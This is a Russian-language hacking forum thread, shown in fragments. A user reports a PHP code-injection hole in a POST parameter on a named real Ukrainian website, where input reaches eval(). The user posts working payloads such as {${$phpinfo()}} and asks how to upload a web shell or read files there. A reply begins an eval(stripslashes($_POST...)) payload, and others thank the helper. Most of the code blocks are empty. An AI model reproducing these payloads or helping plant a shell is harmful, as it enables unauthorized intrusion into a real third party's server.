![]() |
Нашел уязвимость в POST параметре option_id на сайте
http://www. shans.com. ua/ HackBar'ом передаю POST запрос option_id={${$print(1)}}{${$print(1)}}{${$print(1) }} option_id={${$phpinfo()}} Скрипт отрабатывает.... Данные передаются в eval() Кавычки экранируются.... Как залить шелл или прочитать файлы... base64_encode() не срабатывает... пытался залить через curl_init().... Непойму почему данные передаются в "{}" без ";" Вот так не работает {${$a=1; $print($a);}... А так выводит данные - {${$a=1}}{${$print($a)}} в гугле не нашел как выглядит данный скрипт... Если есть чтото подобное киньте ссылку... |
option_id={${eval(stripslashes($_POST
Код:
Code: |
Добырый день
есть пост запрос Код:
Code: |
Цитата:
Код:
Code:или подстановкой пост параметра: Код:
Code: |
Цитата:
|
Присоединяюсь -winstrool спасибо ОГРОМНОЕ!
|
Рад, что вы рады)
|
| Время: 18:59 |